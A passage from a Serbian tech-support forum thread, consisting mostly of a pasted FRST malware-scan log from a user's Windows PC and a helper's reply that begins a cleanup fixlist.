2017-08-09 22:03 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrepl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\system32\msjetoledb40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd3x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msexcl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd2x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjtes40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstext40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\msltus40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjint40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjter40.dll
2017-08-09 22:02 - 2017-08-01 04:34 - 000060312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
2017-08-09 22:02 - 2017-08-01 04:20 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-08-09 22:02 - 2017-08-01 04:20 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-08-09 22:02 - 2017-08-01 04:20 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-08-09 22:02 - 2017-08-01 04:17 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MdmDiagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:16 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2017-08-09 22:02 - 2017-08-01 04:15 - 000239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2017-08-09 22:02 - 2017-08-01 04:12 - 000404992 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2017-08-09 22:02 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-08-09 22:02 - 2017-08-01 04:01 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-08-07 18:11 - 2017-08-07 18:11 - 000000979 _____ C:\Users\Public\Desktop\AVG Protection.lnk
2017-08-07 18:11 - 2017-08-07 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2017-08-07 18:08 - 2017-08-07 18:08 - 000000000 ___HD C:\$AVG
2017-08-07 18:06 - 2017-08-21 21:26 - 000000000 ____D C:\ProgramData\MFAData
2017-08-05 17:21 - 2017-08-05 17:21 - 000001321 _____ C:\Users\dejan\Desktop\Continue Adobe Flash Player Installation.lnk
2017-08-05 00:15 - 2017-08-05 00:15 - 000005554 _____ C:\WINDOWS\system32\PerfStringBackup.TMP
2017-08-04 01:05 - 2017-07-28 06:48 - 001972128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-08-04 01:05 - 2017-07-28 06:48 - 001854832 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\halmacpi.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 000572320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2017-08-04 01:05 - 2017-07-28 06:44 - 000239008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-04 01:05 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-08-04 01:05 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-08-04 01:05 - 2017-07-28 06:39 - 000434592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-08-04 01:05 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-08-04 01:05 - 2017-07-28 06:38 - 000216504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-08-04 01:05 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2017-08-04 01:05 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-08-04 01:05 - 2017-07-28 06:33 - 002081184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-04 01:05 - 2017-07-28 06:33 - 000440184 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-08-04 01:05 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2017-08-04 01:05 - 2017-07-28 06:24 - 000116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-08-04 01:05 - 2017-07-28 06:21 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2017-08-04 01:05 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2017-08-04 01:05 - 2017-07-28 06:20 - 000093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-08-04 01:05 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-08-04 01:05 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2017-08-04 01:05 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000359424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000167424 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-08-04 01:05 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-08-04 01:05 - 2017-07-28 06:15 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-08-04 01:05 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2017-08-04 01:05 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2017-08-04 01:05 - 2017-07-28 06:13 - 000457216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-08-04 01:05 - 2017-07-28 06:12 - 000337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-08-04 01:05 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-08-04 01:05 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-08-04 01:05 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-08-04 01:05 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-08-04 01:05 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-08-04 01:05 - 2017-07-28 06:04 - 000073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2017-08-04 01:05 - 2017-07-28 06:03 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2017-08-04 01:05 - 2017-07-28 06:03 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll
2017-08-04 01:05 - 2017-07-28 06:03 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2017-08-04 01:05 - 2017-07-28 06:03 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-08-04 01:05 - 2017-07-28 06:02 - 001377280 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2017-08-04 01:04 - 2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-08-04 01:04 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-08-04 01:04 - 2017-07-28 06:46 - 000698384 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-08-04 01:04 - 2017-07-28 06:40 - 000755616 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-08-04 01:04 - 2017-07-28 06:38 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-08-04 01:04 - 2017-07-28 06:38 - 000597920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-08-04 01:04 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000090464 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll
2017-08-04 01:04 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll
2017-08-04 01:04 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-08-04 01:04 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll
2017-08-04 01:04 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-08-04 01:04 - 2017-07-28 06:21 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe
2017-08-04 01:04 - 2017-07-28 06:20 - 000206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2017-08-04 01:04 - 2017-07-28 06:19 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-08-04 01:04 - 2017-07-28 06:18 - 000703488 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-08-04 01:04 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000661504 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-08-04 01:04 - 2017-07-28 06:17 - 000393216 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-08-04 01:04 - 2017-07-28 06:17 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-08-04 01:04 - 2017-07-28 06:16 - 000332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-08-04 01:04 - 2017-07-28 06:16 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-08-04 01:04 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000844800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000435712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-08-04 01:04 - 2017-07-28 06:13 - 001208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-08-04 01:04 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-08-04 01:04 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 001513984 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 000962048 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll
2017-08-04 01:04 - 2017-07-28 06:09 - 002370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-08-04 01:04 - 2017-07-28 06:09 - 002040832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 002122240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-08-04 01:04 - 2017-07-28 06:06 - 001126912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-08-04 01:04 - 2017-07-28 06:06 - 000558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-08-04 01:04 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-08-04 01:04 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-08-04 01:04 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll
2017-08-04 01:04 - 2017-07-28 06:04 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 001244160 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll
2017-08-04 01:04 - 2017-07-28 06:01 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
2017-08-03 00:30 - 2017-08-03 00:30 - 000000000 ____D C:\Users\dejan\Documents\GomPlayer

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-21 21:42 - 2017-06-27 13:53 - 000301710 _____ C:\WINDOWS\ZAM.krnl.trace
2017-08-21 21:42 - 2017-06-27 13:53 - 000272673 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-08-21 21:27 - 2017-05-28 21:24 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-08-21 19:19 - 2017-06-13 16:57 - 000000000 ____D C:\Users\dejan
2017-08-21 19:19 - 2017-06-13 16:52 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-21 19:19 - 2016-11-18 20:21 - 000000000 ____D C:\Users\dejan\AppData\Roaming\DMCache
2017-08-21 18:25 - 2017-01-01 00:36 - 000000000 ____D C:\Users\dejan\AppData\Roaming\vlc
2017-08-21 16:24 - 2017-03-07 16:58 - 000000000 ____D C:\Users\dejan\AppData\Local\Adobe
2017-08-20 00:14 - 2017-04-17 20:40 - 000000000 ____D C:\Users\dejan\Downloads\Compressed
2017-08-20 00:14 - 2017-03-11 19:22 - 000000000 ____D C:\Users\dejan\AppData\Roaming\IDM
2017-08-19 23:57 - 2017-06-15 22:59 - 000000000 ____D C:\Users\dejan\Downloads\PopcornTime
2017-08-19 23:23 - 2017-03-18 08:02 - 000008192 _____ C:\WINDOWS\system32\config\ELAM
2017-08-19 19:39 - 2017-03-18 20:23 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-19 19:39 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-19 19:30 - 2017-06-13 17:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-19 19:13 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-08-19 19:10 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-08-14 23:50 - 2017-03-18 08:02 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2017-08-14 23:43 - 2017-04-26 16:31 - 000000000 ____D C:\Users\dejan\AppData\Local\Facebook
2017-08-14 22:56 - 2016-09-07 15:27 - 000000000 ____D C:\Users\dejan\AppData\Local\Packages
2017-08-13 22:14 - 2016-09-24 16:45 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Messenger for Desktop
2017-08-12 19:41 - 2017-06-13 17:56 - 000000000 ____D C:\WINDOWS\Minidump
2017-08-12 19:41 - 2017-03-18 20:21 - 000000000 ____D C:\WINDOWS\INF
2017-08-12 19:39 - 2016-09-08 21:40 - 000001038 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-08-12 19:33 - 2016-09-08 21:40 - 000000000 ____D C:\Program Files\CCleaner
2017-08-12 12:34 - 2017-03-18 20:14 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-11 03:32 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\rescache
2017-08-11 00:17 - 2017-06-13 16:51 - 000223632 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-09 22:09 - 2016-09-07 17:53 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-09 22:04 - 2016-09-07 17:53 - 137505280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 23:48 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-08 19:10 - 2016-12-06 00:06 - 000170200 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-07 22:50 - 2016-12-09 23:37 - 000000000 ____D C:\Users\dejan\AppData\LocalLow\Mozilla
2017-08-07 19:15 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Roaming\WinSAPSvc
2017-08-07 19:09 - 2017-05-27 15:46 - 000000000 ____D C:\Users\dejan\AppData\Local\terana
2017-08-07 18:55 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Local\glory
2017-08-07 18:12 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\Avg
2017-08-07 18:11 - 2017-03-18 20:23 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2017-08-07 18:06 - 2016-12-31 15:39 - 000000000 ____D C:\Program Files\AVG
2017-08-07 18:06 - 2016-09-14 15:56 - 000000000 ____D C:\ProgramData\Avg
2017-08-07 18:05 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\AvgSetupLog
2017-08-07 18:01 - 2016-09-14 16:26 - 000000000 ____D C:\Users\dejan\AppData\Roaming\AVG
2017-08-05 00:14 - 2016-04-27 06:38 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-04 19:18 - 2017-06-13 17:17 - 001135462 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-31 17:15 - 2017-03-18 20:25 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2017-07-31 17:15 - 2017-03-18 20:25 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2017-07-29 00:05 - 2016-10-02 00:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOM
2017-07-29 00:05 - 2016-09-07 23:10 - 000001230 _____ C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\GOM Player.lnk
2017-07-29 00:05 - 2016-09-07 23:10 - 000001206 _____ C:\Users\Public\Desktop\GOM Player.lnk
2017-07-27 16:49 - 2017-06-13 23:31 - 000002367 _____ C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-07-27 16:49 - 2016-04-08 12:39 - 000000000 ___RD C:\Users\dejan\OneDrive

==================== Files in the root of some directories =======

2016-09-23 15:24 - 2016-10-19 12:50 - 000000396 _____ () C:\Users\dejan\AppData\Roaming\burnaware.ini
2016-12-09 01:04 - 2017-02-03 01:46 - 000001002 _____ () C:\Users\dejan\AppData\Roaming\downloads.json
2016-12-26 18:32 - 2016-12-26 18:32 - 000000353 _____ () C:\Users\dejan\AppData\Roaming\imagetuner.ini
2016-12-10 20:57 - 2016-12-11 23:26 - 000004608 _____ () C:\Users\dejan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-04-16 20:41 - 2017-04-16 20:41 - 000003370 _____ () C:\Users\dejan\AppData\Local\recently-used.xbel
2017-06-12 15:05 - 2017-06-12 15:05 - 000000017 _____ () C:\Users\dejan\AppData\Local\resmon.resmoncfg
2017-01-04 22:23 - 2017-01-07 22:01 - 000000176 _____ () C:\Users\dejan\AppData\Local\uts.ini

Files to move or delete:
====================
C:\Users\dejan\k350n_.reg


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-08-12 20:08

==================== End of FRST.txt ============================



https://www.mycity.rs/must-login.png

offline
  • Pridružio: 14 Jun 2016
  • Poruke: 535

Pozdrav, deinstaliraj sledeće programe:

Popcorn Time

Tvoj profil je infektovan i treba da reinstaliraš Chrome.

Otvori Notepad i iskopiraj sljedeći tekst koji se nalazi unutar Kod polja.

CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
